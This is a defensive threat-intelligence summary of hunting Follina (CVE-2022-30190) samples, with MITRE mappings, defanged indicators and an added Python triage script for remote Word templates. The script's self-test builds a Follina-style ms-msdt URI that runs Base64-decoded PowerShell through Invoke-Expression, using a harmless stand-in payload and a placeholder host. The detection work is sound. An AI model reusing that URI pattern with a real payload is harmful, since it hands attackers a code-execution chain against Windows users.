Follina (CVE-2022-30190) is a remote-code-execution vulnerability in the Microsoft Support Diagnostic Tool (MSDT) that was exploited through Word documents loading a remote template carrying the payload. Researchers show how attackers used remote templates and Base64-encoded PowerShell to run code, and describe hunting methods using VirusTotal, YARA and VT Grep to uncover further samples. #Follina #MSDT
Keypoints
- Follina (CVE-2022-30190) is a vulnerability in the Microsoft Support Diagnostic Tool (MSDT), exploited as a zero-day before Microsoft's patch, that enables remote code execution when MSDT is invoked through the ms-msdt: URL protocol handler from a calling application such as Word.
- Attacks use Word's remote template feature: the document links to an externally hosted template, and that template carries the code to execute.
- The remote template holds a payload, typically Base64-encoded, which is decoded and executed (e.g., a malicious PowerShell script).
- The analysts describe a workflow for hunting new samples with VirusTotal: YARA rules, VT Grep queries, and document-property targeting to find remote templates and related artifacts.
- The samples split into "before disclosure" and "after disclosure" groups: proof-of-concept files before public disclosure, and real in-the-wild attacks afterwards, with templates hosted on compromised servers or on ephemeral tunnel hosts (e.g., ngrok).
- IOCs include multiple file hashes, remote-template URLs, domains (e.g., attend-doha-expo.com), and sample names (e.g., Monkeypox.docx) used in campaigns.
- The analysis emphasizes ongoing monitoring and threat intelligence as essential to detect evolving Follina variants and related malware families.
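The chain above (document, remote template, Base64 payload) and the artifact-targeting part of the hunting workflow can be checked offline with a small triage script. The following is an added example, not code from the VirusTotal post: it reads the attachedTemplate relationship that Word stores in the document's .rels parts and flags a remote (TargetMode="External") target, then scans a fetched template for an ms-msdt: URI and decodes long Base64 runs that yield readable text. The .docx and the template HTML it runs on are constructed stand-ins (the host example.invalid, the benign Write-Output payload and the simplified URI are assumptions, not real samples).

```python
import base64
import io
import re
import zipfile
from xml.etree import ElementTree as ET

# OOXML relationship namespace and the relationship type Word uses for an
# attached template; TargetMode="External" means the template is remote.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
TEMPLATE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/attachedTemplate")

MSDT_URI = re.compile(r'ms-msdt:[^"<\n]+', re.IGNORECASE)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def external_template_targets(docx_bytes: bytes) -> list[str]:
    """Return remote attachedTemplate targets from any .rels part.

    Word keeps the link in word/_rels/settings.xml.rels; scanning every
    .rels part also catches documents where that part was renamed.
    """
    targets = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("Type") == TEMPLATE_REL and rel.get("TargetMode") == "External":
                    targets.append(rel.get("Target"))
    return targets


def decode_base64_blobs(text: str) -> list[str]:
    """Decode long Base64 runs that yield readable text (candidate scripts)."""
    found = []
    for m in B64_RUN.finditer(text):
        core = m.group(0).rstrip("=")
        padded = core + "=" * (-len(core) % 4)  # re-pad; 3 pad chars fails validation
        try:
            decoded = base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in decoded):
            found.append(decoded)
    return found


def triage(docx_bytes: bytes, template_text: str = "") -> dict:
    """Combine the document-side and template-side checks into one verdict."""
    templates = external_template_targets(docx_bytes)
    uris = MSDT_URI.findall(template_text)
    payloads = decode_base64_blobs(template_text)
    return {
        "remote_templates": templates,
        "msdt_uris": uris,
        "decoded_payloads": payloads,
        # A remote template that hands control to the ms-msdt: handler is the chain.
        "suspicious": bool(templates) and bool(uris),
    }


# --- constructed sample inputs (not real Follina artifacts) -----------------
SAMPLE_TEMPLATE_URL = "https://example.invalid/index.html"   # placeholder host
SAMPLE_PAYLOAD = "Write-Output 'constructed benign payload'"  # harmless stand-in
SAMPLE_TEMPLATE_HTML = (
    "<html><body><script>\n"
    "// constructed stand-in for a remote template; real ones also pad the\n"
    "// file with comments and assemble the URI by string concatenation\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    "IT_BrowseForFile=$(Invoke-Expression([System.Text.Encoding]::UTF8.GetString("
    "[System.Convert]::FromBase64String('"
    + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    + "'))))\";\n</script></body></html>"
)


def build_sample_docx(template_url):
    """Constructed minimal .docx: remote template link when template_url is
    given, otherwise an ordinary internal template relationship."""
    if template_url:
        rel = (f'<Relationship Id="rId1" Type="{TEMPLATE_REL}" '
               f'Target="{template_url}" TargetMode="External"/>')
    else:
        rel = f'<Relationship Id="rId1" Type="{TEMPLATE_REL}" Target="Normal.dotm"/>'
    rels = (f'<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{RELS_NS}">{rel}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        z.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    import json
    print(json.dumps(triage(build_sample_docx(SAMPLE_TEMPLATE_URL),
                            SAMPLE_TEMPLATE_HTML), indent=2))
```

The document-side check alone is the one worth turning into a hunting rule: a remote attachedTemplate is uncommon in ordinary mail attachments, and it is present before the template is ever fetched, so it works on samples whose hosting server is already gone. The Base64 decoder is deliberately loose (any long run that decodes to text), which is what you want when triaging a template whose PowerShell has been re-encoded or wrapped differently from the samples in the post.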
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Word documents delivered as attachments, linked to a remote template so that opening them executes code via MSDT. Quote: “…a document with a template containing arbitrary code to execute.”
- [T1203] Exploitation for Client Execution – The MSDT vulnerability yields remote code execution when MSDT is invoked through the ms-msdt: URL protocol from Word. Quote: “…can enable remote code execution (RCE) when MSDT is invoked using the URL protocol from a calling application, such as Microsoft Word.”
- [T1105] Ingress Tool Transfer – The malicious document fetches the remote template from an attacker-controlled host. Quote: “The downloaded file is the remote template fetched by the malicious document we are analyzing.”
- [T1059.001] PowerShell – The remote template yields a PowerShell payload that is executed by the sample. Quote: “the malicious Powershell script executed by the sample.”
- [T1027] Obfuscated/Compressed Files and Information – The payload in the remote template is Base64-encoded and decoded for execution. Quote: “The remote template content shows what appears to be a Base64-encoded payload. After decoding, we get the malicious Powershell script…”
Indicators of Compromise
- [SHA-1] – 5757f8027668fc5bdc979df484cabb4c94b5fa3c, 22fa626a3a1eb509a1a14b616d4ec094eb2b8f9a, b22db9ccd50064cbaf5876a4a318ec8eea284585, f5978deec22543a301e7ff4e01db950d8f474a4c, 934561173aba69ff4f7b118181f6c8f467b0695d, 447139a8cfc9660215bef2230e25885f553ddba8, 818803f1bd2d2ac66b2e36ccd9971ba85b8901f0, 06727ffda60359236a8029e0b3e8a0fd11c23313 (the last six appear run together in the source and are split here on 40-hex-character boundaries, so the split assumes they are SHA-1 values)
- [URL] – hxxps://127.0.0[.]1/testtesttest.html (PoC, local host), hxxp://93.115.26[.]76:8000/index.html, hxxps://www.cssformats[.]com/o/SDS84Sl.html, hxxps://708b-27-122-14-41.ap.ngrok[.]io/index.html (ngrok tunnel hostnames are ephemeral; pin on the path and content rather than the host)
- [IP] – 93.115.26[.]76, 212.138.130[.]8 (127.0.0.1 appears only as the loopback host in PoC samples and is not a network indicator)
- [Domain] – attend-doha-expo[.]com, files.attend-doha-expo[.]com, www.cssformats[.]com
- [FileName] – Monkeypox.docx, testtesttest.html (PoC)
Read more: https://blog.virustotal.com/2022/08/hunting-follina.html